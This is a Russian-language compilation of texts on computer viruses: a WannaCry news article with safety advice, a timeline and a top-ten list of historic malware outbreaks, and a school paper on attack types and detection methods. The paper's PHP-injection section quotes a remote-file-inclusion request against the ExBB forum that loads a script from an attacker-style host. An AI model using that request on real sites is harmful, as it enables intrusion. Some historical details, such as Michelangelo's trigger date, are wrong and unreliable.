В последние дни уходящей недели по всему миру прошла волна заражения компьютеров вирусом-шифровальщиком. Пострадали как рядовые граждане, так и вполне серьёзные коммерческие и государственные предприятия и учреждения. По последним данным под удар попали компьютеры из по меньшей мере 150 стран. Но при всей своей массовости вирус поразил далеко не все машины. Как так вышло?

14 05 2017
21:41

Начнём с простого: большинство вирусов попадает на компьютер путём загрузки на него заражённого файла. Чаще всего это исполняемый файл, который требует запуска или же запускается самостоятельно. Для того, чтобы избежать самопроизвольного срабатывания таких программ, система безопасности Windows запрашивает ваше согласие на выполнение действия со свежеустановленным файлом. В случае, если вы не дадите разрешения на запуск приложения, процесс будет автоматически прерван.

Вирусы, которые распространяются внутри локальной сети или путём передачи с помощью внешних устройств (диски, карты памяти), система может обнаружить далеко не всегда. Для этого существует вторая линия обороны – антивирус. Такое ПО позволяет сканировать носители на предмет вредоносных программ, а также проводить регулярную проверку компьютера. Наиболее распространённые антивирусы (NOD 32, Avast, Avira, Kaspersky lab.) обладают широкой базой данных о возможных опасностях, которые регулярно обновляются производителем программ. Чем обширнее база, тем больше вероятность того, что попавший на вашу машину вирус входит в неё, а значит, будет оперативно обнаружен.

Заражение компьютера не всегда становится заметно сразу. Часто всего проблемы начинаются с замедления работы системы, постепенного сокращения свободного места на дисках или же «слетания» заполненных и внесенных в память паролей. В какой-то момент компьютер перестаёт нормально работать – отказывает загружаться или запускать те или иные сервисы и программы, самопроизвольно выключается через определённый промежуток времени. Что с этим делать?

В первую очередь, не паниковать. Если вы не уверены, что способны самостоятельно справиться с проблемой, выключите компьютер и свяжитесь со специалистом. В выключенном виде вирусы не распространяются, так что хуже вы точно не сделаете.

Если же всё не так печально (к примеру, компьютер загружается, но периодически появляются странные окна, надписи и т.д.), то стоит запустить проверку антивирусом. При обнаружении проблем лечить и удалять повреждённые файлы. Программа по защите сама подскажет, что и как делать с виновниками происходящего.

Однако некоторые вирусы блокируют запуск ПО, которое может их обнаружить. Для этого крупные разработчики создали специальный сервис по проверке компьютера на вредоносные программы без установки приложения. Пользователь запускает на компьютере исполняемый файл, который при помощи интернет-канала устанавливает соединение с базой данных вирусов и производит сканирование машины. После обнаружения заражённые файлы также подлежат удалению.

Вирусы-шифровальщики также поддаются «лечению». Правда, для того, чтобы расшифровать свои данные, вам потребуется код, который преступники якобы должны высылать своей жертве. Для старых версий подобных программ коды известны, их можно найти на просторах интернета в свободном доступе.

Но последний вирус, поразивший весь мир, таких кодов не имел. Распространялся он по сети, при этом вовсе не обязательно было что-то устанавливать на компьютер – шифровальщик цеплялся к машине самостоятельно. При попытке оперативного (до появления сообщения о заражении) лечения указанными выше способами он появляется вновь, рано или поздно открывая окно с информацией о том, что ваше устройство было взломано. Этот вирус лечится, но проще всего переустановить всю систему. В любом случае будут потеряны все аудио-, видеофайлы, изображения и текстовые документы, ведь они уже зашифрованы, так что полное обновление системы будет просто более быстрым решением. Действенных способов спасти и расшифровать файлы пока нет.

Но почему он поразил не все компьютеры? Помимо того, что во время прохождения атаки не все пользователи были в сети, часть из активных компьютеров была защищена путём обновления Windows. Да, всё правильно. Те, кто не убирал галочки с поля «разрешить автоматическую установку обновлений», оказались в безопасности, ибо критическая уязвимость, которой пользуется этот шифровальщик, была устранена более месяца назад.

Чтобы ничего подобного не прилетало по сети безнаказанно, необходимо пользоваться ещё одним защитным механизмом – фаерволом. Это, грубо говоря, фильтр данных, поступающих на вашу компьютер по сети. Часто он блокирует работу безобидных программ, игр и пакетов с неизвестным создателем, что бывает очень неудобно в обычной ситуации. Но защита – так защита.

Будьте бдительны. Дублируйте свои документы на внешних и облачных носителях.

Дмитрий Потапкин, специально для Обзор.press.

Компьютеры в РФ, на Украине, в Турции и Германии. По предварительным данным, криптовирус Bad Rabbit (англ. "плохой кролик") послужил причиной недоступности для пользователей сайтов ряда СМИ, в частности - российского агентства "Интерфакс". Кроме того, сообщалось о "хакерской атаке" на информационную систему международного аэропорта Одессы (Украина) и метрополитен Киева.

Вирусы-вымогатели (ransomware, криптовирусы) работают по схожей схеме: они блокируют рабочий стол пользователя компьютера, шифруют все файлы определенных типов, найденные на компьютере, после чего удаляют оригиналы и требуют выкуп (обычно - перевод определенной суммы денежных средств на счет злоумышленников) за ключ, разрешающий продолжить работу и вернуть файлы. Зачастую создатели криптовирусов ставят пользователям жесткие условия по срокам уплаты выкупа, и если владелец файлов не укладывается в эти сроки, ключ удаляется. После этого восстановить файлы становится невозможно.

Редакция ТАСС-ДОСЬЕ подготовила хронологию первых в истории вирусов, а также наиболее масштабных вирусных компьютерных атак.

В 1971 году первую в мире программу, которая была способна самостоятельно размножать свои копии в компьютерной сети, создал инженер американской технологической компании BBN Technologies Боб Томас. Программа, получившая название Creeper не была вредоносной: ее функционал ограничивался самокопированием и выведением на терминал надписи: "Я крипер, поймай меня, если сможешь". Годом позже другой инженер BBN, изобретатель электронной почты Рэй Томлинсон, создал первый антивирус, который самостоятельно "размножался" на компьютерах сети и удалял Creeper.

В 1981 году был создан первый вирус, который впервые вызвал неконтролирумую "эпидемию". Вирус под названием Elk Cloner (англ. "Клонирователь оленя") был создан 15-летним американским студентом Ричардом Скрентой для компьютеров Apple II. Вирус заражал магнитные дискеты и после 50-го обращения к зараженному носителю выводил на дисплей стишок, а в отдельных случаях он мог также повредить дискету.

В феврале 1991 года в Австралии появился первый вирус, масштаб заражения которым составил более 1 млн компьютеров по всему миру. Вредоносная программа Michelangelo была написана для IBM-совместимых персональных компьютеров (ПК) и операционной системы DOS. Она срабатывала каждый год 6 мая, в день рождения итальянского художника и скульптора Микеланджело Буонаротти, стирая данные на главной загрузочной области жесткого диска. Прочую информацию с диска можно было восстановить, но рядовому пользователю ПК сделать это было сложно. Создатель вируса остался неизвестен, отдельные случаи срабатывания программы фиксировались вплоть до 1997 года.

2 июня 1997 года студент Датунского университета (Тайбэй, Тайвань; КНР) Чэнь Инхао создал первую версию вируса Chernobyl ("Чернобыль" или CIH - по первым слогам имени имени автора). Вирус заражал компьютеры с операционными системами Windows 95 и 98, срабатывал каждый год 26 апреля, в годовщину катастрофы на Чернобыльской АЭС. Вирус стирал загрузочную область жесткого диска и, реже, данные BIOS - загрузочной области компьютера. В последнем случае требовалось менять чип на материнской плате или даже приобретать новый компьютер, так как старый выходил из строя. По оценкам, заражению подверглись более 60 млн ПК по всему миру, ущерб превысил $1 млрд. Непосредственно к Чэнь Инхао исков подано не было, он избежал ответственности.

5 мая 2000 года в мире началась наиболее масштабная эпидемия компьютерного вируса. Созданный филиппинскими студентами Реонелем Рамонесом и Онелем де Гузманом "почтовый червь" ILOVEYOU (англ. "я тебя люблю") рассылал себя по всем контактам электронной почты владельца зараженного ПК и заменял на свои копии большинство файлов с документами, изображениями и музыкой. Только в первые 10 дней эпидемии число зараженных компьютеров превысило 50 млн. Чтобы защититься от эпидемии, многие государственные учреждения по всему миру временно отключили электронную почту. Совокупный ущерб впоследствии был оценен в $15 млрд. Создателей вируса быстро вычислила филиппинская полиция. Однако они остались безнаказанными из-за отсутствия в местном уголовном кодексе статьи, предусматривающей ответственность за компьютерные преступления.

В сентябре 2010 года вирус Stuxnet поразил компьютеры сотрудников АЭС в Бушере (Иран) и создал проблемы в функционировании центрифуг комплекса по обогащению урана в Натанзе. По мнению экспертов, Stuxnet стал первым вирусом, который был использован как кибероружие.

12 мая 2017 года значительное число компьютеров с операционной системой Windows подверглось атаке вируса-вымогателя WannaCry (англ. "хочу плакать"). Вирус шифрует файлы пользователя, чтобы их нельзя было использовать; за расшифровку данных злоумышленники требовали заплатить $600 в криптовалюте биткойн. Всего было заражено до 300 тыс. компьютеров в по меньшей мере 150 странах мира. Предполагаемый ущерб превысил $1 млрд. От атаки, в частности, пострадали Национальная система здравоохранения (NHS) Великобритании, испанская телекоммуникационная компания Telefonica, электронная система суда бразильского штата Сан-Паулу и др. Глобальная хакерская атака также затронула компьютеры российских силовых ведомств и телекоммуникационных компаний. Атакам подверглись системы МЧС, МВД, РЖД, Сбербанка, мобильных операторов "Мегафон" и "Вымпелком". По данным американских экспертов, вымогавшим средства злоумышленникам поступило всего 302 платежа в общем размере около $116,5 тыс. По оценкам Сбербанка, более 70% "успешно" атакованных компьютеров принадлежали российским организациям и физическим лицам. После атаки Microsoft выпустила обновления пакетов безопасности для уже не поддерживавшихся операционных систем Windows XP, Windows Server 2003 и Windows 8.

27 июня 2017 года от атаки компьютерного вируса - шифровальщика Petya.А пострадали десятки компаний в РФ и на Украине. По сообщению Group-IB, которая занимается предотвращением и расследованием киберпреступлений, в России атаке подверглись компьютерные системы "Роснефти", "Башнефти", "Евраза", российских офисов компаний Mars, Mondeles и Nivea. На Украине вирусной атаке подверглись компьютеры "Киевэнерго", "Укрэнерго", "Ощадбанка" и концерна "Антонов". Также из-за вируса временно отключился автоматический мониторинг промышленной площадки на Чернобыльской АЭС. Вирус Petya распространяется через ссылки в сообщениях электронной почты и блокирует доступ пользователя к жесткому диску компьютера, требуя выкуп в размере $300 в биткойнах. Этим он схож с вредоносной программой WannaCry, с которой была связана предыдущая крупная вирусная атака в мае 2017 года.

Всем нам прекрасно известно, что в связи со своими размерами, всемирная паутина полна опасностей и как правило, они подстерегают людей на локальном уровне, без критического ущерба всемирному интернет сообществу. Но, существуют и достаточно массовые проблемы, которые могут привести к всеобщему бедствию.

Одна из таких проблем – это хакерство. В прошлом году в этом убедилась крупнейшая компания Sony, у которой выкрали персональную информацию об игроках платформы PlayStation.

Более 77 миллионов пользователей стали уязвимыми из-за незаконных действий хакеров. Такие действия наносят огромный ущерб всем программам и веб-сайтам, подвергающимся взлому.

Когда мы говорим о хакерстве, нельзя не упомянуть и легендарные вирусные атаки, которые поставили под угрозу безопасность десятков, а то и сотни миллионов пользователей по всему миру.

Топ 10 исторических вирусных атак в Интернете

Червь Морриса

Это первый случай появления сетевого червя на просторах интернета. Его создателем стал Роберт Т. Моррис в 1988 году, в честь которого и была названа вирусная программа.

По его словам, основной целью создания скрипта послужило желание измерить охват Интернета по всему миру. Вместо этого, он нанес ущерб в размере от 10 до 100 миллионов долларов, парализовав работоспособность около 6000 интернет-узлов.

Вирус Мелисса

Названный в честь стриптизерши, вирус Мелисса ударил по крупнейшим мировым компаниям, включая Microsoft, заставив их закрыть почтовые шлюзы, через которые происходили массовые заражения вирусом.

Почтовый вирус ILOVEYOU

В 2000 году на Филиппинах был разработан уникальный почтовый вирус, который разошелся миллионным тиражом по всему миру. Он представлял собой электронное письмо с фразой “Я тебя люблю” и вложенным вирусным скриптом с расширением.vbs, которое, конечно же, было скрыто от пользователей. После открытия, это письмо активировало цепную реакцию, рассылая такое же письмо от имени пользователя всем его контактам. В итоге, ущерб, в процессе его искоренения составил около 10-15 миллиардов долларов. За его разрушительность, он даже попал в книгу рекордов Гиннесса.

Червь Code Red

Настоящее бедствие для пользователей веб-сервера Microsoft IIS состоялось 13 июля 2001 года, когда на них началась массовая атака червя под названием Code Red. Проникая на сервера, он заменял содержимое сайта, и при заходе на него высвечивалось сообщение “Привет, сайт взломан китайцами!”. В общей сложности, финансовые потери во время остановок крупных проектов составили 2,6 миллиарда долларов.

Вирусный червь Nimda

После трагических событий 11 сентября 2001 года в Нью-Йорке, многие люди стали связывать появление страшнейшего червя Nimda с продолжающимся террором на территории Соединенных Шатов Америки. Главная его цель – размножение и охват как можно большего количества интернет пользователей. Как итог, ущерб 635 миллионов долларов.

SQL Slammer

Вирус, использующий дыру в SQL серверах компании Microsoft, был создан с целью быстрого распространения в сети, отказа в обслуживании и общего замедления работы Интернета.

Вирус MS Blast

Опасный вирус MS Blast атакует пользователей операционной системы Windows, в особенности поражая сервисы обновления детища Microsoft.

Почтовый вирус Mydoom

Работая по схожему сценарию, что и вирус ILOVEYOU, на почту пользователей приходили странные письма с прикрепленным файлом “Я всего лишь выполняю свою работу, ничего личного”. После заражения, вирус блокирует доступ к сайтам Microsoft, новостным порталам и ресурсам антивирусных приложений.

Червь Sasser

Не такой опасный, но очень заразный вирус инфицировал сотни тысяч пользователей. После того, как он попадает на компьютер, Sasser в автоматическом режиме начинает проверку на слабость другие машины, без участия пользователей. Главной особенностью вируса является его способность перезагружать компьютеры.

Вирус Witty

Пользуясь погрешностями брандмауэра BlackICE, Witty проникает на компьютеры пользователей, активно посылает код другим участникам всемирной паутины и заполняет дисковое пространство произвольной информацией. Были зарегистрированы сотни тысяч случаев заражения данным вирусом.

Copyright МБОУ "Гимназия 75" г. Казань 2014

Исследование

Цели исследования:

выявить уровень знаний преподавателей и учащихся гимназии о биологических и компьютерных вирусах, о способах профилактики и борьбы с компьютерными и биологическими вирусами.

«Мне кажется, компьютерные вирусы стоит рассматривать, как форму жизни. Это многое говорит о природе человека: единственная форма жизни, которую мы создали к настоящему моменту, несёт только разрушения. Мы создаём жизнь по образу и подобию своему.»

"Блуждание по Интернету - настолько же безмозглая идея, как постоянное переключение телеканалов."

Афоризмы

Главным переносчиком компьютерных вирусов являются компьютерные мыши.

Если у тебя в компьютере постоянно живут вирусы, то ещё надо подумать, кому в первую очередь надо лечиться. (Стас Янковский)

Содержание:
Введение

Вирусные атаки и их виды.
Средства обнаружения вирусных атак.

Заключение

Введение
Вирусная атака - это покушение на удалённую/локальную вычислительную систему с использованием вредоносных программ (вирусов).
Вирусные атаки представляет собой более изощрённый метод получения доступа к закрытой информации, так как хакеры используют специальные программы для ведения работы на компьютере жертвы, а также дальнейшего распространения (это вирусы и черви). Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны.
На данный момент вирусные атаки представляют серьезную угрозу для простых пользователей, не говоря уже и о крупных предприятиях, информация которых может иметь огромную ценность. Именно по этой причине организация и проведение вирусных атак представляет из себя целую индустрию, в которой заинтересованы не только злоумышленники (сетевые преступники), но и производители антивирусного ПО.
Мы, как простые пользователи ПК, должны знать, как защититься от вирусных атак, как не стать ее случайными участниками, а для этого нужно знать – что же такое вирусная атака, способы и методы их применения.

Вирусные атаки и их виды.

Вирусная атака - действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании.

Mailbombing

Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом.

Переполнение буфера

Пожалуй, один из самых распространенных типов атак в Интернете. Принцип данной атаки построен на использовании программных ошибок, позволяющих вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права.

Сетевая разведка

В ходе такой атаки собственно не производится никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.
В ходе такой разведки злоумышленник может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей.

Сниффинг пакетов

Также довольно распространённый вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемым сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.

IP-спуфинг

Тоже распространённый вид атаки в недостаточно защищённых сетях, когда злоумышленник выдаёт себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого крэкеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений.

Man-in-the-Middle

Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне злоумышленник может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки - кража или фальсифицирование передаваемой информации, или же получение доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации.

Инъекция

Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних команд или данных в работающую систему с целью изменения хода работы системы, а в результате - получение доступа к закрытым функциям и информации, либо дестабилизации работы системы в целом. Наиболее популярна такая атака в сети Интернет, но также может быть проведена через командную строку системы.
SQL-инъекция - атака, в ходе которой изменяются параметры SQL- запросов к базе данных. В результате запрос приобретает совершенно иной смысл, и в случае недостаточной фильтрации входных данных способен не только произвести вывод конфиденциальной информации, но и изменить/удалить данные. Очень часто такой вид атаки можно наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае - переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.
Вместо проверки можно подставить утверждение, которое будучи истинным позволит обойти проверку

PHP-инъекция - один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный злонамеренный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости, как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом:
GET //modules/threadstop/ threadstop.php?new_exbb=evilhackerscorp.com/tx. txt????? .
Межсайтовый скриптинг или XSS (аббр. от англ. Cross Site Scripting) - тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript. Другие названия: CSS, реже - скрипт-инъекция.
XPath-инъекция - вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных.

Отказ в обслуживании

DoS (от англ. Denial of Service - Отказ в обслуживании) - атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своём коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.
DDoS (от англ. Distributed Denial of Service - Распределенная DoS) - подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.
Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм крэкера и ценность информации, а также недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения и недостаточное внимание к вопросам безопасности в компании в целом.

Средства обнаружения вирусных атак.

На данный момент антивирусное программное обеспечение разрабатывается в основном для ОС семейства Windows от компании Microsoft, что вызвано большим количеством вредоносных программ именно под эту платформу (а это, в свою очередь, вызвано большой популярностью этой ОС, также как и большим количеством средств разработки, в том числе бесплатных и даже «инструкций по написанию вирусов»). В настоящий момент на рынок выходят продукты и под другие платформы настольных компьютеров, такие как Linux и Mac OS X. Это вызвано началом распространения вредоносных программ и под эти платформы, хотя UNIX-подобные системы всегда славились своей надежностью. Например, известное видео «Mac or PC» шуточно показывает преимущество Mac OS над Windows и большим антивирусным иммунитетом Mac OS по сравнению с Windows.

Помимо ОС для настольных компьютеров и ноутбуков, также существуют платформы и для мобильных устройств, такие как Windows Mobile, Symbian, iOS, BlackBerry, Android, Windows Phone 7 и др. Пользователи устройств на данных ОС также подвержены риску заражения вредоносным программным обеспечением, поэтому некоторые разработчики антивирусных программ выпускают продукты и для таких устройств.

Классификация антивирусных продуктов
Классифицировать антивирусные продукты можно сразу по нескольким признакам, таким как: используемые технологии антивирусной защиты, функционал продуктов, целевые платформы.

По используемым технологиям антивирусной защиты:

Классические антивирусные продукты (продукты, применяющие только сигнатурный метод детектирования)
Продукты проактивной антивирусной защиты (продукты, применяющие только проактивные технологии антивирусной защиты);
Комбинированные продукты (продукты, применяющие как классические, сигнатурные методы защиты, так и проактивные)

По функционалу продуктов:

Антивирусные продукты (продукты, обеспечивающие только антивирусную защиту)
Комбинированные продукты (продукты, обеспечивающие не только защиту от вредоносных программ, но и фильтрацию спама, шифрование и резервное копирование данных и другие функции)

Эффективность системы обнаружения атак во многом зависит от применяемых методов анализа полученной информации. В первых системах обнаружения атак, разработанных в начале 1980-х годов, использовались статистические методы обнаружения атак. В настоящее время к статистическому анализу добавился ряд новых методик, начиная с экспертных систем и нечёткой логики и заканчивая использованием нейронных сетей.

Статистический метод

Основные преимущества статистического подхода - использование уже разработанного и зарекомендовавшего себя аппарата математической статистики и адаптация к поведению субъекта.
Сначала для всех субъектов анализируемой системы определяются профили. Любое отклонение используемого профиля от эталонного считается несанкционированной деятельностью. Статистические методы универсальны, поскольку для проведения анализа не требуется знания о возможных атаках и используемых ими уязвимостях. Однако при использовании этих методик возникают и проблемы:

«статистические» системы не чувствительны к порядку следования событий; в некоторых случаях одни и те же события в зависимости от порядка их следования могут характеризовать аномальную или нормальную деятельность;
трудно задать граничные (пороговые) значения отслеживаемых системой обнаружения атак характеристик, чтобы адекватно идентифицировать аномальную деятельность;
«статистические» системы могут быть с течением времени «обучены» нарушителями так, чтобы атакующие действия рассматривались как нормальные.

Следует также учитывать, что статистические методы не применимы в тех случаях, когда для пользователя отсутствует шаблон типичного поведения или когда для пользователя типичны несанкционированные действия.

Экспертные системы

Экспертные системы состоят из набора правил, которые охватывают знания человека-эксперта. Использование экспертных систем представляет собой распространенный метод обнаружения атак, при котором информация об атаках формулируется в виде правил. Эти правила могут быть записаны, например, в виде последовательности действий или в виде сигнатуры. При выполнении любого из этих правил принимается решение о наличии несанкционированной деятельности. Важным достоинством такого подхода является практически полное отсутствие ложных тревог.
БД экспертной системы должна содержать сценарии большинства известных на сегодняшний день атак. Для того чтобы оставаться постоянно актуальными, экспертные системы требуют постоянного обновления БД. Хотя экспертные системы предлагают хорошую возможность для просмотра данных в журналах регистрации, требуемые обновления могут либо игнорироваться, либо выполняться администратором вручную. Как минимум, это приводит к экспертной системе с ослабленными возможностями. В худшем случае отсутствие надлежащего сопровождения снижает степень защищенности всей сети, вводя ее пользователей в заблуждение относительно действительного уровня защищенности.
Основным недостатком является невозможность отражения неизвестных атак. При этом даже небольшое изменение уже известной атаки может стать серьезным препятствием для функционирования системы обнаружения атак.

Нейронные сети

Большинство современных методов обнаружения атак используют некоторую форму анализа контролируемого пространства на основе правил или статистического подхода. В качестве контролируемого пространства могут выступать журналы регистрации или сетевой трафик. Анализ опирается на набор заранее определённых правил, которые создаются администратором или самой системой обнаружения атак.
Любое разделение атаки во времени или среди нескольких злоумышленников является трудным для обнаружения при помощи экспертных систем. Из-за большого разнообразия атак и хакеров даже специальные постоянные обновления БД правил экспертной системы никогда не дадут гарантии точной идентификации всего диапазона атак.
Использование нейронных сетей является одним из способов преодоления указанных проблем экспертных систем. В отличие от экспертных систем, которые могут дать пользователю определённый ответ о соответствии рассматриваемых характеристик заложенным в БД правилам, нейронная сеть проводит анализ информации и предоставляет возможность оценить, согласуются ли данные с характеристиками, которые она научена распознавать. В то время как степень соответствия нейросетевого представления может достигать 100 %, достоверность выбора полностью зависит от качества системы в анализе примеров поставленной задачи.
Сначала нейросеть обучают правильной идентификации на предварительно подобранной выборке примеров предметной области. Реакция нейросети анализируется и система настраивается таким образом, чтобы достичь удовлетворительных результатов. В дополнение к начальному периоду обучения, нейросеть набирается опыта с течением времени, по мере того, как она проводит анализ данных, связанных с предметной областью.
Важным преимуществом нейронных сетей при обнаружении злоупотреблений является их способность «изучать» характеристики умышленных атак и идентифицировать элементы, которые не похожи на те, что наблюдались в сети прежде.
Каждый из описанных методов обладает рядом достоинств и недостатков, поэтому сейчас практически трудно встретить систему, реализующую только один из описанных методов. Как правило, эти методы используются в совокупности.

Обнаружение, основанное на сигнатурах
Обнаружение, основанное на сигнатурах - метод работы антивирусов и систем обнаружения вторжений, при котором программа, просматривая файл или пакет, обращается к словарю с известными вирусами, составленному авторами программы. В случае соответствия какого-либо участка кода просматриваемой программы известному коду (сигнатуре) вируса в словаре, программа антивирус может заняться выполнением одного из следующих действий:

Удалить инфицированный файл.
Отправить файл в «карантин» (то есть сделать его недоступным для выполнения, с целью недопущения дальнейшего распространения вируса).
Попытаться восстановить файл, удалив сам вирус из тела файла.

Для достижения достаточно продолжительного успеха, при использовании этого метода необходимо периодически пополнять словарь известных вирусов новыми определениями (в основном в онлайновом режиме). Обладающие чувством гражданского долга и технически искушённые пользователи, обнаружив «живьём» новый вирус, могут выслать заражённый файл разработчикам антивирусных программ, которые включат затем новый вирус в словарь.
Антивирусные программы, созданные на основе метода соответствия определению вирусов в словаре, обычно просматривают файлы тогда, когда компьютерная система создаёт, открывает, закрывает или посылает файлы по электронной почте. Таким образом, вирусы можно обнаружить сразу же после занесения их в компьютер и до того, как они смогут причинить какой-либо вред. Надо отметить, что системный администратор может составить график для антивирусной программы, согласно которому могут просматриваться (сканироваться) все файлы на жёстком диске.
Хотя антивирусные программы, созданные на основе поиска соответствия определению вируса в словаре, при обычных обстоятельствах, могут достаточно эффективно препятствовать вспышкам заражения компьютеров, авторы вирусов стараются держаться на полшага впереди таких программ-антивирусов, создавая «олигоморфические», «полиморфические» и, самые новые, «метаморфические» вирусы, в которых некоторые части участки кода перезаписываютсся, модифицируются, шифруются или искажаются так, чтобы невозможно было обнаружить совпадение с определением в словаре вирусов.
Доступно одно описание одного из методов аппаратного сканирования по ссылке. Оно заключается в попутном сканировании потока данных специальным устройством под названием контекстный сопроцессор.

Создание и распределение сигнатур
Сигнатуры антивирусов создаются в результате кропотливого анализа нескольких копий файла, принадлежащего одному вирусу. Сигнатура должна содержать только уникальные строки из этого файла, настолько характерные, чтобы гарантировать минимальную возможность ложного срабатывания - главный приоритет любой антивирусной компании.
Разработка сигнатур - ручной процесс, тяжело поддающийся автоматизации. Несмотря на массу исследований, посвящённых автоматической генерации сигнатур, нарастающий полиморфизм (и «метаморфизм») вирусов и атак делают синтактические сигнатуры бессмысленными. Антивирусные компании вынуждены выпускать большое количество сигнатур для всех вариантов одного и того же вируса, и если бы не закон Мура, ни один современный компьютер уже не смог бы закончить сканирование большого числа файлов с такой массой сигнатур в разумное время.
В нынешнем виде, базы сигнатур должны пополняться регулярно, так как большинство антивирусов не в состоянии обнаруживать новые вирусы самостоятельно. Любой владелец ПО, основанного на сигнатурах, обречён на регулярную зависимость от обновления сигнатур, что составляет основу бизнес-модели производителей антивирусов и СОВ.
Своевременная доставка новых сигнатур до пользователей также является серьёзной проблемой для производителей ПО. Современные вирусы и черви распространяются с такой скоростью, что к моменту выпуска сигнатуры и доставки её на компьютер пользователей, эпидемия уже может достигнуть своей высшей точки и охватить весь мир. По опубликованным данным, доставка сигнатуры занимает от 11 до 97 часов в зависимости от производителя, в то время как теоретически, вирус может захватить весь интернет меньше, чем за 30 секунд.
В большинстве ПО по безопасности база сигнатур является ядром продукта, наиболее трудоёмкой и ценной частью. Именно поэтому большинство вендоров предпочитает держать свои сигнатуры закрытыми - хотя и в этой области существует ряд открытого ПО (напр., ClamAV), а также исследования по обратной разработке закрытых сигнатур. Virus Bulletin регулярно публиковал сигнатуры новых вирусов вплоть до 2000 года.
Проблемы разработки сигнатур и слабого распределения некоторых представителей вредоносного ПО приводят к тому, что разработанные в разных антивирусных компаниях сигнатуры содержат определения для разных подмножеств вирусов. Эту проблему можно устранить, разработав международный стандарт на описание антивирусных сигнатур, который будет содержать необходимую информацию для обнаружения, идентификации и устранения вредоносного ПО. Максимальный эффект от такого стандарта можно получить при реализации централизованной базы знаний по вредоносному ПО, в которую все антивирусные компании будут иметь право записи новых сигнатур (или изменение существующих). Но в таком централизованном хранилище (базе данных) каждая запись должна иметь цифровую подпись автора (конкретной компании), которая будет защищать конечных пользователей от атаки на локальную базу сигнатур путем отравления её содержимого. Так же при добавлении новых записей в центральное хранилище сигнатур должен изменяться рейтинг фирм производителей. Этот рейтинг сделает фирмы заинтересованными, так как их работу пользователь может напрямую оценивать.

Недостатки и достоинства синтаксических сигнатур

Позволяют определять конкретную атаку с высокой точностью и малой долей ложных вызовов
Неспособны выявить какие-либо новые атаки
Беззащитны перед полиморфными вирусами и изменёнными версиями того же вируса
Требуют регулярного и крайне оперативного обновления
Требуют кропотливого ручного анализа вирусов

